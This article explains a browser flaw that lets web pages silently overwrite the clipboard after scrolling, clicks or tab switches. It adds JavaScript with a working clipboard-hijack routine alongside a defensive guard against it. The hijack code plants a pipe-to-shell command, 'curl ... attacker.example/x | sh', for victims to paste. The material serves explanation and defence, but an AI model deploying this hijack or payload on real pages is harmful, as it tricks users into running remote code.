The vulnerability can be exploited in a number of ways, all of which let the page overwrite the contents of the clipboard, according to developer Jeff Johnson. The user-gesture requirement that is supposed to gate clipboard writes is satisfied not only by deliberately performing a cut or copy action, but also by clicking a link on the site or by very basic actions such as scrolling up or down the offending page.
Johnson went into further detail about the flaw, noting that Chrome users can be affected merely by briefly visiting a malicious page, whereas Firefox and Safari users must actively copy content to the clipboard with Ctrl+C or Cmd+C.
In order to be able to write to the clipboard, the website needs to be in the active tab. Quickly toggling tabs is enough. You don’t have to interact with the website or look at it for more than a tenth of a second. pic.twitter.com/KzsT6UByAq
— Šime “I’m on Mastodon” Vidas (@simevidas) September 2, 2022
Johnson's blog post links to video demos from Šime Vidas, who produces content for web developers. Vidas's examples show how quickly Chrome users can be hit, because the vulnerability only has to be triggered by switching between open browser tabs.
The malicious page instantly replaces whatever the user had copied, regardless of its length or type, with anything the threat actor chooses to supply.
Johnson's post explains in detail how a website can satisfy the requirements for writing to the system clipboard. One method uses the now-deprecated document.execCommand('copy').
Another uses the newer navigator.clipboard.writeText API, which can place arbitrary text on the clipboard without any further steps. Johnson's site provides working demos of both approaches.
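As an added example (not code from Johnson's post or from this article), the following JavaScript shows both write paths named above hooked to gesture events such as scrolling and key presses, next to a defensive wrapper of the kind a userscript or extension content script could install, which only lets a page write the clipboard shortly after a genuine copy or cut event. The `win` parameter, the `makeFakeWindow` stub, the payload string, the set of gesture events and the one-second allow window are assumptions made so the code runs offline under Node; in a real page you would pass `window`.

```javascript
// Added example, not code from Johnson's post. `win` is passed in explicitly so
// the same functions work against the real `window` in a browser and against
// the constructed stub at the bottom under Node.

// Constructed sample payload (assumption): what the attacker wants the victim
// to paste later, e.g. into a terminal.
const ATTACKER_PAYLOAD = 'curl -fsSL http://attacker.example/x | sh';

// Events assumed here to satisfy the user-gesture requirement (the article
// names key presses, clicks and scrolling).
const GESTURE_EVENTS = ['keydown', 'wheel', 'scroll', 'click', 'mousedown'];

// Write path 1: the async Clipboard API. Resolves to the name of the path used.
function writeViaAsyncApi(win, text) {
  const cb = win.navigator && win.navigator.clipboard;
  if (!cb || typeof cb.writeText !== 'function') {
    return Promise.reject(new Error('navigator.clipboard.writeText unavailable'));
  }
  return cb.writeText(text).then(() => 'writeText');
}

// Write path 2: deprecated execCommand('copy'). It copies the current selection,
// so the text is staged in a throwaway <textarea> first.
function writeViaExecCommand(win, text) {
  const doc = win.document;
  const ta = doc.createElement('textarea');
  ta.value = text;
  doc.body.appendChild(ta);
  ta.select();
  const ok = doc.execCommand('copy');
  doc.body.removeChild(ta);
  return ok ? 'execCommand' : null;
}

// Modern API first, execCommand as fallback when it is missing or rejects.
function overwriteClipboard(win, text) {
  return writeViaAsyncApi(win, text).catch(() => writeViaExecCommand(win, text));
}

// Attacker side: overwrite the clipboard on any gesture; no copy action needed.
function installClipboardHijack(win, text) {
  const handler = () => overwriteClipboard(win, text);
  for (const ev of GESTURE_EVENTS) win.addEventListener(ev, handler);
  return handler;
}

// Defender side (a userscript or extension content script could do this):
// let the page write the clipboard only within allowWindowMs of a real copy/cut.
function installClipboardWriteGuard(win, allowWindowMs = 1000) {
  const state = { lastCopy: -Infinity, blocked: 0 };
  const now = () => win.performance.now();
  const recent = () => now() - state.lastCopy <= allowWindowMs;
  win.addEventListener('copy', () => { state.lastCopy = now(); });
  win.addEventListener('cut', () => { state.lastCopy = now(); });

  const cb = win.navigator.clipboard;
  const origWrite = cb.writeText.bind(cb);
  cb.writeText = (text) => {
    if (recent()) return origWrite(text);
    state.blocked += 1;
    return Promise.reject(new Error('clipboard write blocked: no recent copy/cut'));
  };
  const doc = win.document;
  const origExec = doc.execCommand.bind(doc);
  doc.execCommand = (cmd, ...rest) => {
    if (cmd !== 'copy' || recent()) return origExec(cmd, ...rest);
    state.blocked += 1;
    return false;
  };
  return state;
}

// Constructed stand-in for the browser so the example runs offline under Node:
// event dispatch, a clipboard, and a document whose execCommand('copy') copies
// the last selected textarea's value. No DOM tree is modelled.
function makeFakeWindow() {
  const listeners = {};
  const clipboard = { text: '' };
  let selection = '';
  const doc = {
    body: { appendChild() {}, removeChild() {} },
    createElement: () => ({ value: '', select() { selection = this.value; } }),
    execCommand(cmd) { if (cmd !== 'copy') return false; clipboard.text = selection; return true; },
  };
  return {
    document: doc,
    clipboard,
    navigator: { clipboard: { writeText(t) { clipboard.text = t; return Promise.resolve(); } } },
    performance: { now: () => Date.now() },
    addEventListener(ev, fn) { (listeners[ev] = listeners[ev] || []).push(fn); },
    dispatch(ev) { return Promise.all((listeners[ev] || []).map((fn) => fn())); },
  };
}

// Stand-alone demo: a scroll on the booby-trapped page replaces the clipboard.
const victim = makeFakeWindow();
installClipboardHijack(victim, ATTACKER_PAYLOAD);
victim.dispatch('scroll');
console.log('clipboard after scroll:', JSON.stringify(victim.clipboard.text));
```

Two caveats for a real browser: `navigator.clipboard` is only exposed in secure contexts (HTTPS), which is why the `execCommand` fallback is kept, and the guard only helps if it runs before the page's own scripts, so an extension would register it at `document_start`. The guard is a heuristic: a page that waits for the user to press Ctrl+C and then rewrites the clipboard within the allow window still gets through, which is exactly the Firefox and Safari case the article describes.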